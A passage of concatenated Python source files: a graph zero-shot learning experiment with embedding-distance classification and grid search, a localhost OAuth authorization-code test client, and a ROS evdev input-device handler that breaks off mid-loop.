dict_unseen_edges = self.label_edges_classes_ordered(unseen_edges)
# for c in unseen_classes:
# unseen_edges.append(dict_true_edges[c])
return unseen_edges, test_edges, dict_train_edges, dict_test_edges, dict_unseen_edges
def seen_graph(self):
graph = self.graph
for edge in self.unseen_edges:
graph.remove_edge(edge[0], edge[1])
for edge in self.test_edges:
graph.remove_edge(edge[0], edge[1])
return graph
def ogre_initial_nodes(self, gnx):
train_classes = list(self.dict_train_edges.keys())
train_nodes = train_classes.copy()
for c in train_classes:
train_nodes.append(self.dict_train_edges[c][0][1])
# try:
# train_nodes.append(self.dict_train_edges[c][1][1])
# except:
# continue
        initial_graph = gnx.subgraph(train_nodes)
        return initial_graph
class Classifier:
def __init__(self, dict_train_true, dict_test_true, dict_unseen_edges,
dict_projections, embedding, args):
self.args = args
self.embedding = embedding
self.dict_true_edges = dict_train_true
self.dict_test_true = dict_test_true
self.dict_unseen_edges = dict_unseen_edges
self.norm = set(args.norm)
self.dict_projections = dict_projections
def edges_distance(self, edges):
"""
Calculate the distance of an edge. Take the vertices of the edge and calculate the distance between their
embeddings.
We use to calculate The distance with L1, l2, Cosine Similarity.
:param edge: the edge we want to find its distance.
:return: The distance
"""
embed_edges_0 = [self.dict_projections[edge[0]] for edge in edges]
embed_edges_1 = [self.dict_projections[edge[1]] for edge in edges]
if self.norm == set('L1 Norm'):
norms = la.norm(np.subtract(embed_edges_0, embed_edges_1), 1, axis=1)
elif self.norm == set('L2 Norm'):
norms = la.norm(np.subtract(embed_edges_0, embed_edges_1), 2, axis=1)
elif self.norm == set('cosine'):
try:
all_norms = cosine_similarity(embed_edges_0, embed_edges_1)
norms = []
for i in range(len(all_norms)):
if np.abs(all_norms[i, i]) <= 1:
norms.append(math.acos(all_norms[i, i]))
elif all_norms[i, i] > 1:
norms.append(math.acos(1))
elif all_norms[i, i] < -1:
norms.append(math.acos(-1))
# norms = [math.acos(all_norms[i, i]) if np.abs(all_norms[i, i]) < 1 else math.acos(1) for i in range(len(all_norms))]
            except Exception as e:
                print(f'cosine similarity computation failed: {e}')
else:
raise ValueError(f"Wrong name of norm, {self.norm}")
final_norms = np.array(norms).reshape(-1, 1)
return final_norms
def edge_distance(self, edge):
"""
Calculate the distance of an edge. Take the vertices of the edge and calculate the distance between their
embeddings.
We use to calculate The distance with L1, l2, Cosine Similarity.
:param edge: the edge we want to find its distance.
:return: The distance
"""
try:
embd1 = np.array(self.dict_projections[edge[0]]).astype(float)
embd2 = np.array(self.dict_projections[edge[1]]).astype(float)
except:
embd1 = np.ones(self.args.embedding_dimension).astype(float)
embd2 = np.zeros(self.args.embedding_dimension).astype(float)
pass
if self.norm == set('L1 Norm'):
norm = la.norm(np.subtract(embd1, embd2), 1)
elif self.norm == set('L2 Norm'):
            norm = la.norm(np.subtract(embd1, embd2), 2)
elif self.norm == set('cosine'):
norm = math.acos(cosine_similarity(embd1.reshape(1, -1), embd2.reshape(1, -1))[0])
else:
raise ValueError(f"Wrong name of norm, {self.norm}")
return norm
def calculate_classifier_value(self, true_edges, false_edges):
"""
Create x and y for Logistic Regression Classifier.
self.dict_projections: A dictionary of all nodes embeddings, where keys==nodes and values==embeddings
:param true_edges: A list of true edges.
:param false_edges: A list of false edges.
:return: x_true/x_false - The feature matrix for logistic regression classifier, of true/false edge.
The i'th row is the norm score calculated for each edge.
y_true_edge/y_false_edge - The edges labels, [1,0] for true/ [0,1] for false.
Also the edge of the label is concatenate to the label.
"""
x_true = self.edges_distance(true_edges)
x_false = self.edges_distance(false_edges)
# x_true, x_false = np.array(norms_true).reshape(-1, 1), np.array(norms_false).reshape(-1, 1)
y_true_edge = np.column_stack((np.ones(shape=(len(true_edges), 1)),
np.zeros(shape=(len(true_edges), 1)))).astype(int)
y_false_edge = np.column_stack((np.zeros(shape=(len(false_edges), 1)),
np.ones(shape=(len(false_edges), 1)))).astype(int)
return x_true, x_false, y_true_edge, y_false_edge
def calculate_by_single_norm(self, true_edges, false_edges):
x_true, x_false = np.zeros(shape=(len(true_edges), 1)), np.zeros(shape=(len(false_edges), 1))
y_true_edge, y_false_edge = np.zeros(shape=(len(true_edges), 4)).astype(int), \
np.zeros(shape=(len(false_edges), 4)).astype(int)
for i, edge in enumerate(true_edges):
norm = self.edge_distance(edge)
x_true[i, 0] = norm
# y_true_edge[i, 2] = edge[0]
# y_true_edge[i, 3] = edge[1]
y_true_edge[i, 0] = str(1)
for i, edge in enumerate(false_edges):
norm = self.edge_distance(edge)
x_false[i, 0] = norm
# y_false_edge[i, 2] = edge[0]
# y_false_edge[i, 3] = edge[1]
y_false_edge[i, 1] = str(1)
return x_true, x_false, y_true_edge, y_false_edge
@staticmethod
def concat_data(x_true, x_false, y_true_edge, y_false_edge):
"""
split the data into rain and test for the true edges and the false one.
:param ratio: determine the train size.
:return: THe split data
"""
x_train, y_train = np.concatenate((x_true, x_false), axis=0), \
np.concatenate((y_true_edge, y_false_edge), axis=0)
# y_train = np.array([y_train_edge.T[0].reshape(-1, 1), y_train_edge.T[1].reshape(-1, 1)]).T.reshape(-1,
# 2).astype(
# int)
return x_train, y_train
def train(self):
"""
Prepare the data for train, also train the classifier and make the test data divide by classes.
:return: The classifier and dict_class_movie_test
"""
path2 = os.path.join(self.args.data_name, f'train/dict_{self.embedding}_{self.args.norm}.pkl')
classes = list(self.dict_true_edges.keys())
# for i, k in enumerate(sorted(self.dict_true_edges, key=lambda x: len(self.dict_true_edges[x]), reverse=True)):
# classes[i] = k
dict_class_movie_test = {}
test_classes = list(self.dict_test_true.keys())
unseen_classes = list(self.dict_unseen_edges.keys())
for c in test_classes:
dict_movie_edge = {}
for edge in self.dict_test_true[c]:
if edge[0][0] == 'c':
movie = edge[1]
else:
movie = edge[0]
dict_movie_edge[movie] = edge
dict_class_movie_test[c] = dict_movie_edge.copy()
for c in unseen_classes:
dict_movie_edge = {}
for edge in self.dict_unseen_edges[c]:
if edge[0][0] == 'c':
movie = edge[1]
else:
movie = edge[0]
dict_movie_edge[movie] = edge
dict_class_movie_test[c] = dict_movie_edge.copy()
# if not os.path.exists(os.path.join('Graph-ZSL', self.args.data_name)):
# os.makedirs(os.path.join('Graph-ZSL', self.args.data_name))
with open(path2, 'wb') as fid:
pickle.dump(dict_class_movie_test, fid)
return dict_class_movie_test
def evaluate(self, dict_class_movie_test):
# evaluate
classes = list(dict_class_movie_test.keys())
pred_true = []
pred = []
# for i, k in enumerate(sorted(dict_class_movie_test, key=lambda x: len(dict_class_movie_test[x]), reverse=True)):
# classes[i] = k
num_classes = len(classes)
dict_measures = {'acc': {}, 'precision': {}}
dict_class_measures = {}
for c in classes:
class_movies = list(dict_class_movie_test[c].keys())
count = 0
for m in class_movies:
edges = np.array([np.repeat(m, num_classes), classes]).T
class_test = np.zeros(shape=(len(edges), 1))
# if set(self.args.embedding) != set('OGRE'):
class_test = self.edges_distance(edges)
# else:
# for i, edge in enumerate(edges):
# norm = self.edge_distance(edge)
# class_test[i, 0] = norm
# _, probs = self.predict_edge_classification(classif2, class_test)
# pred_index = np.argmax(probs.T[0])
pred_index = np.argmax(class_test)
prediction = edges[pred_index]
real_edge = list(dict_class_movie_test[c][m])
pred_true.append(c)
if prediction[0][0] == 'c':
pred.append(prediction[0])
else:
pred.append(prediction[1])
if prediction[0] == real_edge[0]:
if prediction[1] == real_edge[1]:
count += 1
elif prediction[1] == real_edge[0]:
if prediction[0] == real_edge[1]:
count += 1
accuracy = count / len(class_movies)
dict_measures['acc'] = accuracy
dict_class_measures[c] = dict_measures.copy()
with open(os.path.join(self.args.data_name, f'dict_class_measures_{self.embedding}_{self.args.norm}.pkl'),
'wb') as handle:
pickle.dump(dict_class_measures, handle, protocol=3)
# TODO dict class measures for every ratio
return dict_class_measures, pred, pred_true
def evaluate_for_hist(self, dict_class_movie_test):
# evaluate
classes = list(dict_class_movie_test.keys())
hist_real_unseen_pred = np.zeros(len(classes))
hist_real_unseen_first_unseen = np.zeros(len(classes))
pred_true = []
pred = []
# for i, k in enumerate(sorted(dict_class_movie_test, key=lambda x: len(dict_class_movie_test[x]), reverse=True)):
# classes[i] = k
num_classes = len(classes)
seen_flag = np.zeros(int(self.args.seen_percentage*len(classes)))
unseen_flag = np.ones(len(classes)-int(self.args.seen_percentage*len(classes)))
classes_flag = np.concatenate((seen_flag, unseen_flag))
dict_measures = {'acc': {}, 'precision': {}}
dict_class_measures = {}
for i, c in enumerate(classes):
class_movies = list(dict_class_movie_test[c].keys())
count = 0
for m in class_movies:
edges = np.array([np.repeat(m, num_classes), classes]).T
class_test = np.zeros(shape=(len(edges), 1))
# if set(self.args.embedding) != set('OGRE'):
class_test = self.edges_distance(edges)
# else:
# for j, edge in enumerate(edges):
# norm = self.edge_distance(edge)
# class_test[j, 0] = norm
# _, probs = self.predict_edge_classification(classif2, class_test)
# pred_index = np.argmax(probs.T[0])
try:
class_norm_test = np.column_stack((np.column_stack((class_test, classes)), classes_flag))
                except Exception as e:
                    print(f'failed to build class_norm_test: {e}')
sorted_class_norm = class_norm_test[np.argsort(class_norm_test[:, 0])]
# if set(self.args.norm) == set('cosine'):
# sorted_class_norm = np.flip(sorted_class_norm)
# sort_classes = sorted_class_norm.T[0]
# else:
sort_classes = sorted_class_norm.T[1]
sort_norm = sorted_class_norm.T[0].astype(float)
sort_classes_flag = sorted_class_norm.T[2].astype(float)
# class_test[::-1].sort(axis=0)
prediction = np.array([m, sort_classes[0]])
# prediction = edges[pred_index]
real_edge = list(dict_class_movie_test[c][m])
pred_true.append(c)
if i > int(self.args.seen_percentage*len(classes)):
place = np.where(sort_classes == c)[0][0]
hist_real_unseen_pred[place] += 1
place = np.where(sort_classes_flag == 1)[0][0]
if self.args.unseen_weight_advantage*sort_norm[place] < sort_norm[0]:
pred.append(sort_classes[place])
else:
pred.append(sort_classes[0])
# pred.append(sort_classes[0])
# if prediction[0][0] == 'c':
# pred.append(prediction[0])
# else:
# pred.append(prediction[1])
if prediction[0] == real_edge[0]:
if prediction[1] == real_edge[1]:
count += 1
elif prediction[1] == real_edge[0]:
if prediction[0] == real_edge[1]:
count += 1
accuracy = count / len(class_movies)
dict_measures['acc'] = accuracy
dict_class_measures[c] = dict_measures.copy()
with open(os.path.join(self.args.data_name, f'dict_class_measures_{self.embedding}_{self.args.norm}.pkl'),
'wb') as handle:
pickle.dump(dict_class_measures, handle, protocol=3)
# TODO dict class measures for every ratio
return dict_class_measures, pred, pred_true, hist_real_unseen_pred
def hist_plot_for_unseen_dist_eval(self, distances):
title = 'Histogram Of The Distance Between \n Unseen Label Norm And Predicted Norm'
x_label = f'Distance, limit:{len(distances)}'
y_label = 'Count'
hist_plot(distances, title, x_label, y_label)
plt.savefig(f'{self.args.data_name}/plots/hist_distance_real_unseen-prediction_'
f'{self.embedding}_{self.args.norm}_{int(100*self.args.seen_percentage)}_seen_percent')
def confusion_matrix_maker(self, dict_class_measures, pred, pred_true):
conf_matrix = confusion_matrix(pred_true, pred, labels=list(dict_class_measures.keys()))
seen_true_count = 0
seen_count = 0
unseen_true_count = 0
unseen_count = 0
seen_number = int(self.args.seen_percentage * len(conf_matrix))
classes = list(dict_class_measures.keys())
seen_idx = []
unseen_idx = []
for i, c in enumerate(classes):
if len(set([c]).intersection(set(self.dict_unseen_edges.keys()))) > 0:
unseen_idx.append(i)
else:
seen_idx.append(i)
for i in seen_idx:
seen_true_count += conf_matrix[i][i]
for j in range(len(classes)):
seen_count += conf_matrix[i][j]
for i in unseen_idx:
unseen_true_count += conf_matrix[i][i]
for j in range(len(conf_matrix)):
unseen_count += conf_matrix[i][j]
# for i in range(len(conf_matrix))[:seen_number]:
# seen_true_count += conf_matrix[i][i]
# for j in range(len(conf_matrix)):
# seen_count += conf_matrix[i][j]
# for i in range(len(conf_matrix))[seen_number:]:
# unseen_true_count += conf_matrix[i][i]
# for j in range(len(conf_matrix)):
# unseen_count += conf_matrix[i][j]
accuracy = (seen_true_count + unseen_true_count) / (seen_count + unseen_count)
seen_accuracy = seen_true_count / seen_count
unseen_accuracy = unseen_true_count / unseen_count
print(f'accuracy all: {accuracy}')
print(f'accuracy all seen: {seen_accuracy}')
print(f'accuracy all unseen: {unseen_accuracy}')
return accuracy, seen_accuracy, unseen_accuracy, conf_matrix
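    # Editor's worked illustration (hypothetical numbers): with classes [s1, s2, u1] where
    # u1 is unseen, and confusion matrix rows [[4, 1, 0], [0, 3, 2], [1, 0, 4]], the seen
    # rows contribute 4 + 3 = 7 correct out of 10 predictions (seen_accuracy = 0.7), the
    # unseen row contributes 4 out of 5 (unseen_accuracy = 0.8), and the overall accuracy
    # is (7 + 4) / 15.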
def plot_confusion_matrix_all_classes(self, conf_matrix):
plt.figure(0)
title = f'Confusion Matrix, ZSL {self.args.data_name} \n' \
f'{self.embedding} {self.args.norm} {int(100 * self.args.seen_percentage)} Percent Seen'
x_title = f"True Labels {int(100 * self.args.seen_percentage)}/{100 - int(100 * self.args.seen_percentage)}" \
f" (seen/unseen)"
y_title = f"Predicted Labels"
plot_confusion_matrix(conf_matrix, title, x_title, y_title)
plt.savefig(f'{self.args.data_name}/plots/confusion_matrix_{self.embedding}_{self.args.norm}'
f'_{int(100 * self.args.seen_percentage)}_seen_percent')
from dataclasses import dataclass
@dataclass
class InventoryItem:
"""Class for keeping track of an item in inventory."""
data_name: str
threshold: float
norm: str
embedding: str
false_per_true: str
def define_args(params):
print(params)
weights = np.array([params['weights_movie_movie'], params['weights_movie_class']]).astype(float)
parser = argparse.ArgumentParser()
parser.add_argument('--data_name', default=params['data_name']) # our_imdb, awa2
parser.add_argument('--threshold', default=params['threshold'])
parser.add_argument('--norm', default=params['norma_types']) # cosine / L2 Norm / L1 Norm
parser.add_argument('--embedding', default=params['embedding_type']) # Node2Vec / Event2Vec / OGRE
# embedding = params[2]
parser.add_argument('--false_per_true', default=10)
parser.add_argument('--ratio', default=[0.8])
parser.add_argument('--seen_percentage', default=float(params['seen_percentage']))
parser.add_argument('--embedding_dimension', default=int(params['embedding_dimensions']))
parser.add_argument('--unseen_weight_advantage', default=0.9)
parser.add_argument('--graph_percentage', default=1)
if params['data_name'] == 'awa2':
parser.add_argument('--awa2_attributes_weight', default=params['awa2_attributes_weight'])
import torch
cuda = torch.cuda.is_available()
parser.add_argument('--cnn', default='materials/resnet50-base.pth')
if cuda:
parser.add_argument('--gpu', default='0')
else:
parser.add_argument('--gpu', default='-1')
parser.add_argument('--consider-trains', action='store_false')
parser.add_argument('--output', default=None)
parser.add_argument('--images_threshold', default=0.10)
# embedding_dimension = params[3].astype(int)
args = parser.parse_args()
return args, weights
def obj_func_grid(params, specific_split=True, split=None): # split False or True
"""
Main Function for link prediction task.
:return:
"""
args, weights = define_args(params)
np.random.seed(0)
# ratio_arr = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
graph_maker = GraphImporter(args)
# multi_graph = graph_maker.import_imdb_multi_graph(weights)
if args.data_name == 'our_imdb':
weighted_graph = graph_maker.import_imdb_weighted_graph(weights)
elif args.data_name == 'awa2':
awa2_att_weight = params['awa2_attributes_weight']
weighted_graph, split = graph_maker.import_awa2_graph(weights, specific_split, awa2_att_weight)
else:
raise ValueError(f"Wrong name of DataSet, {args.data_name}")
edges_preparation = EdgesPreparation(weighted_graph, args, split)
# dict_true_edges = edges_preparation.label_edges_classes_ordered(edges_preparation.label_edges)
# dict_false_edges = edges_preparation.make_false_label_edges(dict_true_edges)
dict_train_true = edges_preparation.dict_train_edges
dict_test_true = edges_preparation.dict_test_edges
dict_unseen_edges = edges_preparation.dict_unseen_edges
graph = edges_preparation.seen_graph()
embeddings_maker = EmbeddingCreator(graph, args.embedding_dimension, args)
if args.embedding == 'Node2Vec':
dict_embeddings = embeddings_maker.create_node2vec_embeddings()
elif args.embedding == 'Event2Vec':
dict_embeddings = embeddings_maker.create_event2vec_embeddings()
elif args.embedding == 'OGRE':
initial_nodes = edges_preparation.ogre_initial_nodes(graph)
dict_embeddings = embeddings_maker.create_ogre_embeddings(user_initial_nodes_choice=initial_nodes)
else:
raise ValueError(f"Wrong name of embedding, {args.embedding}")
classifier = Classifier(dict_train_true, dict_test_true, dict_unseen_edges,
dict_embeddings, args.embedding, args)
dict_class_movie_test = classifier.train()
dict_class_measures_node2vec, pred, pred_true, hist_real_unseen_pred = classifier.evaluate_for_hist(dict_class_movie_test)
# classifier.hist_plot_for_unseen_dist_eval(hist_real_unseen_pred)
accuracy, seen_accuracy, unseen_accuracy, conf_matrix = classifier.confusion_matrix_maker(
dict_class_measures_node2vec, pred, pred_true)
# classifier.plot_confusion_matrix_all_classes(conf_matrix)
return accuracy, seen_accuracy, unseen_accuracy
def flatten_dict(d):
def items():
for key, value in d.items():
if isinstance(value, dict):
for subkey, subvalue in flatten_dict(value).items():
yield key + "." + subkey, subvalue
else:
yield key, value
return dict(items())
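# Editor's illustrative check (not part of the original script): flatten_dict joins nested
# keys with ".", e.g.
#   flatten_dict({"a": 1, "b": {"c": 2, "d": {"e": 3}}}) == {"a": 1, "b.c": 2, "b.d.e": 3}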
def config_to_str(config):
config = flatten_dict(config)
return [str(config.get(k, "--")) for k in HEADER]
def run_grid(grid_params, res_dir, now):
grid_params = grid_params if type(grid_params) is dict else json.load(open(grid_params, "rt"))
res_filename = os.path.join(res_dir, f"{grid_params['data_name'][0]}_grid_{now}.csv")
out = open(res_filename, "wt")
out.write(f"{','.join(HEADER)}\n")
for config in grid(grid_params):
param = {p: config[i] for i, p in enumerate(list(grid_params.keys()))}
acc, seen_acc, unseen_acc = obj_func_grid(param)
table_row = config_to_str(param)
table_row[HEADER.index('acc')] = str(acc)
table_row[HEADER.index('seen_acc')] = str(seen_acc)
table_row[HEADER.index('unseen_acc')] = str(unseen_acc)
out.write(f"{','.join(table_row)}\n")
out.close()
def main():
seen_accuracies, unseen_accuracies = [], []
parameters = {
"data_name": ['our_imdb'], # 'awa2', 'our_imdb'
"embedding_type": ["Node2Vec"],
"embedding_dimensions": [32, 64, 128, 256],
# "weights_movie_class": [1],
# "weights_movie_movie": [1],
"weights_movie_class": np.logspace(-2, 3, 6),
"weights_movie_movie": np.logspace(-2, 3, 6),
"norma_types": ['cosine'],
"threshold": [0.3, 0.6, 0.9],
"seen_percentage": [0.8],
# "seen_percentage": np.linspace(0.1, 0.9, 9)
"awa2_attributes_weight": [100] # 100 is the best for now
}
num = 0
for param in grid(parameters):
dict_param = {p: param[i] for i, p in enumerate(list(parameters.keys()))}
# param = np.array([w_m_m, w_m_c, e_type, dim, norma_type, threshold, per, data, w_att])
print(f'iteration number {num}')
num += 1
acc, seen_acc, unseen_acc = obj_func_grid(dict_param)
seen_accuracies.append(seen_acc*100)
unseen_accuracies.append(unseen_acc*100)
# print("all accuracy: ", acc)
dict_measures = {"unseen_accuracy": unseen_accuracies, "seen_accuracy": seen_accuracies}
plots_2measures_vs_parameter(dict_measures, parameters["seen_percentage"], 'seen Percentage', 'our_imdb',
'Zero Shot Learning', "Accuracy", parameters["norma_types"][0],
parameters["embedding_type"][0])
if __name__ == '__main__':
res_dir = "C:\\Users\\kfirs\\lab\\Zero Shot Learning\\New-Graph-ZSL\\grid_results"
# now = datetime.now().strftime("%d%m%y_%H%M%S")
now = "01_03_21"
parameters = {
"data_name": ['our_imdb'], # 'awa2', 'our_imdb'
"embedding_type": ["Node2Vec"],
"embedding_dimensions": [32, 64, 128, 256],
# "weights_movie_class": [1],
# "weights_movie_movie": [1],
"weights_movie_class": np.logspace(-2, 3, 6),
"weights_movie_movie": np.logspace(-2, 3, 6),
"norma_types": ['cosine'],
"threshold": [0.3, 0.6, 0.9],
"seen_percentage": [0.8],
# "seen_percentage": np.linspace(0.1, 0.9, 9)
"awa2_attributes_weight": [100] # 100 is the best for now
}
processes = []
    parameters_by_processes = []
for w_m_m in parameters["weights_movie_movie"]:
for w_m_c in parameters["weights_movie_class"]:
param_by_parameters = parameters.copy()
param_by_parameters["weights_movie_movie"] = [w_m_m]
param_by_parameters["weights_movie_class"] = [w_m_c]
            parameters_by_processes.append(param_by_parameters)
    for i in range(len(parameters_by_processes)):
        proc = multiprocessing.Process(target=run_grid, args=(parameters_by_processes[i], res_dir, now, ))
processes.append(proc)
proc.start()
for p in processes:
p.join()
|
get_code.py
|
# pip install requests
# requests>=2.5.0
import threading
import requests
from pprint import pprint
import http.server as SimpleHTTPServer
import socketserver
api_port=5000
auth_url='http://127.0.0.1:5000/oauth/authorize'
server_port=3000
#redirect_url='http://127.0.0.1:3000'
redirect_uri='http%3A%2F%2F127.0.0.1%3A3000'
client_id='9a195ac5-1a34-4bdd-837e-13f80bc5364d'
print('Check client_id (../manage_py --id=1 uuid):')
print(client_id)
url=auth_url+('?redirect_uri=%s&client_id=%s' % (redirect_uri,client_id))+'&response_type=code&state=state_test&response_mode=query'
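# Editor's aside (illustrative, not part of the original script): the percent-encoded
# redirect_uri above can equivalently be produced with the standard library, e.g.
#   from urllib.parse import quote
#   quote('http://127.0.0.1:3000', safe='')  # -> 'http%3A%2F%2F127.0.0.1%3A3000'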
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
request_path = self.path
print('Request:')
pprint(request_path)
        if 'state=state_test' not in request_path:
message='error: state=state_test'
else:
i=request_path.find('code=')
if i>0:
message=request_path[i:]
else:
message = 'error: code'
print('Message=%s' % message)
self.send_response(200)
self.end_headers()
class Server(socketserver.TCPServer):
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def start_httpd(port, server_class=Server, handler_class=Handler):
with server_class(('', port), handler_class) as server:
server.serve_forever()
def server_thread():
start_httpd(server_port)
try:
thread_type = threading.Thread(target=server_thread)
thread_type.start()
thread_type.join(4)
demo_login = {"user": "demo", "password": "demo"}
session = requests.Session()
login = session.post('http://localhost:%d/json_login' % api_port, None, demo_login)
cookies=session.cookies.get_dict()
response=session.get(url, cookies=cookies)
    print('end of test')
    print('Press ^C to stop')
except Exception as e:
print("Error: %s" % e)
|
device.py
|
from io import BytesIO
import os
import selectors
from threading import Lock, Thread
from typing import Dict, Iterator, Optional, Tuple, Union, cast
import evdev
import rospy
from .shape import DeviceShape
from .util import evdev_util
from .util.evdev_const import DeviceAxis, DeviceEventType, DeviceKey, SyncEvent
class AxisBuf:
"""A buffer storing the state of a single absolute axis on an input device.
    Axis values are remapped from a source interval [a, b] to a user-defined target
interval [a', b'], which allows for the normalization of joystick values.
"""
def __init__(self, init_value: float, from_min: float, from_max: float, to_min: float, to_max: float, deadband: float):
"""Creates a new buffer for an absolute axis with the given properties.
Parameters
----------
init_value : float
The initial axis value.
from_min : float
The minimum value for the source interval.
from_max : float
The maximum value for the source interval.
to_min : float
The minimum value for the target interval.
to_max : float
The maximum value for the target interval.
deadband : float
            The fraction of the input range on either side of the input center that is mapped to the output center (the dead zone).
"""
# Set up slopes and output offsets, as well as the bounds for the 3 regions introduced by the deadband
self._scale = (to_max - to_min) / ((1 - deadband) * (from_max - from_min))
self._offset = (to_max + to_min) / 2
input_center = (from_max + from_min) / 2
self._deadband_high = deadband * (from_max - input_center) + input_center
self._deadband_low = deadband * (from_min - input_center) + input_center
# Sort the regions in the event of inversion maps
self._low_region_lower_bound = min(self._deadband_low, from_min)
self._low_region_upper_bound = max(self._deadband_low, from_min)
self._high_region_lower_bound = min(self._deadband_high, from_max)
self._high_region_upper_bound = max(self._deadband_high, from_max)
self._center_region_lower_bound = min(self._low_region_upper_bound, self._high_region_lower_bound)
self._center_region_upper_bound = max(self._low_region_upper_bound, self._high_region_lower_bound)
# Update the output value
self._value = self._remap(init_value)
@property
def value(self) -> float:
"""The current remapped value of the axis.
Returns
-------
float
The remapped axis value.
"""
return self._value
def update(self, unmapped_value: float):
"""Writes a new value to the buffer.
Parameters
----------
unmapped_value : float
The unmapped axis value.
"""
self._value = self._remap(unmapped_value)
def _remap(self, unmapped_value: float) -> float:
"""Remaps an axis value to the target interval.
Parameters
----------
unmapped_value : float
The unmapped axis value.
Returns
-------
float
The remapped axis value.
"""
# TODO: This is an opportunity to improve code in the future if we migrate the wrover and base station to Python 3.10
if self._low_region_lower_bound <= unmapped_value <= self._low_region_upper_bound:
return self._scale * (unmapped_value - self._deadband_low) + self._offset
elif self._center_region_lower_bound <= unmapped_value <= self._center_region_upper_bound:
return self._offset
elif self._high_region_lower_bound <= unmapped_value <= self._high_region_upper_bound:
return self._scale * (unmapped_value - self._deadband_high) + self._offset
else:
raise ValueError(f"Value {unmapped_value} is not in the desginated input region of {(self._low_region_lower_bound, self._high_region_upper_bound)}")
class KeyBuf:
"""A buffer storing the state of a single button on an input device.
Considerably simpler than the axis buffer.
"""
def __init__(self, init_value: bool):
"""Creates a new buffer for a button.
Parameters
----------
init_value : bool
The initial state of the button.
"""
self.value = init_value
class InputDevice:
"""Represents a single input device and all of its state.
Instances of this class maintain a polling thread that consumes evdev events.
To ensure that the thread is cleaned up and to prevent deadlocks, users of this
class should make sure to call `kill` on an instance when it is no longer needed.
"""
def __init__(self, device: Union[str, evdev.InputDevice], shape: DeviceShape):
"""Constructs a new `InputDevice` instance for the given device.
The device will be polled for capabilities, which will allow for the creation
of state buffers for each axis and button on the device. To start the evdev
polling thread, call `start`; the `InputDevice` will not be able to track the
device's state until then.
Parameters
----------
device : Union[str, evdev.InputDevice]
The device, given either as a path to a device file or as an instance of
`evdev.InputDevice`.
shape : DeviceShape
The shape of the device.
See Also
--------
start : Initializes evdev polling.
"""
self.shape = shape
self._dev = device if isinstance(device, evdev.InputDevice) else evdev.InputDevice(device)
self._poll_thread_ctx: Optional[Tuple[Thread, int]] = None # thread and notify pipe
self._thread_lock = Lock()
self._axis_cache: Dict[DeviceAxis, AxisBuf] = {}
self._key_cache: Dict[DeviceKey, KeyBuf] = {}
self._data_lock = Lock()
# construct axis and key buffers based on the device's advertised capabilities
for ev_type, ev_caps in self._dev.capabilities().items():
ev_codes = evdev_util.get_capability_codes(ev_caps)
if ev_type == DeviceEventType.EV_ABS:
for code in ev_codes:
axis: DeviceAxis
try:
axis = DeviceAxis(code)
except ValueError:
continue
axis_def = shape.axes.get(axis)
if axis_def is None:
continue
axis_info = self._dev.absinfo(code)
self._axis_cache[axis] = AxisBuf(
axis_info.value, axis_info.min, axis_info.max, axis_def.min_val, axis_def.max_val, axis_def.deadband)
elif ev_type == DeviceEventType.EV_KEY:
init_key_states = set(self._dev.active_keys())
for code in ev_codes:
try:
self._key_cache[DeviceKey(code)] = KeyBuf(code in init_key_states)
except ValueError:
pass
def start(self):
"""Initializes the evdev polling thread.
This is what allows for the tracking of the device's state. Once this device
is no longer needed, the `kill` method should be called to ensure that the
polling thread is cleaned up properly in order to prevent resource leaks and
deadlocks.
Raises
------
ValueError
If the polling thread has already been started, or if the device has
already been shut down.
Notes
-----
Evdev events are organized into "frames", each of which is separated by an
EV_SYN event of code SYN_REPORT. Inputs should only be considered committed
when a whole frame has been sent. In the case where the event buffer overflows,
events will be lost, in which case the frame may be incomplete. This is
indicated by an EV_SYN event of code SYN_DROPPED, which signals to us that we
need to resynchronize with the frames. See [1]_ for more details.
References
----------
.. [1] https://www.freedesktop.org/software/libevdev/doc/latest/syn_dropped.html
"""
with self._thread_lock:
if self._dev.fd == -1:
raise ValueError('Device is already closed!')
elif self._poll_thread_ctx is not None:
raise ValueError('Poll thread already exists!')
# may deadlock if the device is lost, since the selector will never receive an event
# so we add a virtual pipe for the selector to read from that we can use to "break out"
notify_pipe_r, notify_pipe_w = os.pipe2(os.O_NONBLOCK)
def poll():
rospy.loginfo('Initializing evdev thread state...')
axis_temp: Dict[DeviceAxis, int] = dict() # temp buffers for the current incomplete frame
key_temp: Dict[DeviceKey, int] = dict()
syn_okay = True # if SYN_DROPPED, this becomes false to indicate that the frame is fragmented
def consume_event(event: evdev.InputEvent):
nonlocal syn_okay
if event.type == DeviceEventType.EV_ABS: # axis state event
if syn_okay:
try:
axis_temp[DeviceAxis(event.code)] = event.value
except ValueError:
pass
elif event.type == DeviceEventType.EV_KEY: # key state event
if syn_okay:
try:
key_temp[DeviceKey(event.code)] = event.value
except ValueError:
pass
elif event.type == DeviceEventType.EV_SYN: # synchronization event
if event.code == SyncEvent.SYN_REPORT: # end of a sync frame
if syn_okay: # sync frame was okay; copy data for frame to state caches
for axis_code, state in axis_temp.items(): # copy axis state
try:
axis_buf = self._axis_cache.get(DeviceAxis(axis_code))
if axis_buf is not None:
axis_buf.update(state)
except ValueError:
pass
axis_temp.clear()
for key_code, state in key_temp.items(): # copy key state
try:
key_buf = self._key_cache.get(DeviceKey(key_code))
if key_buf is not None:
key_buf.value = state != 0 # 0 => release; 1 => press; 2 => hold
except ValueError:
pass
key_temp.clear()
else: # sync frame was bad; retrieve actual state using ioctl, then return to normal
syn_okay = True
for abs_code, abs_buf in self._axis_cache.items(): # resync axis states
abs_buf.update(self._dev.absinfo(abs_code.value).value) # shouldn't need to update other axis props... probably
for key_buf in self._key_cache.values(): # resync key states
key_buf.value = False
for key_code in self._dev.active_keys():
try:
key_buf = self._key_cache.get(DeviceKey(key_code))
if key_buf is not None:
key_buf.value = True
except ValueError:
pass
elif event.code == SyncEvent.SYN_DROPPED: # sync was lost; drop the sync frame and wait for the next one
axis_temp.clear()
key_temp.clear()
syn_okay = False
# check to ensure that the device is still there; better safe than sorry
with self._thread_lock:
if self._dev.fd == -1:
rospy.loginfo('Device was dead before the evdev thread was ready!')
return
with open(notify_pipe_r, 'rb') as notify_pipe_file:
# use selector to conjoin the device and the virtual "break-out" pipe
sel = selectors.DefaultSelector()
sel.register(self._dev, selectors.EVENT_READ)
sel.register(notify_pipe_file, selectors.EVENT_READ)
rospy.loginfo('Entering evdev polling loop...')
while True:
# read events
for key, _ in sel.select():
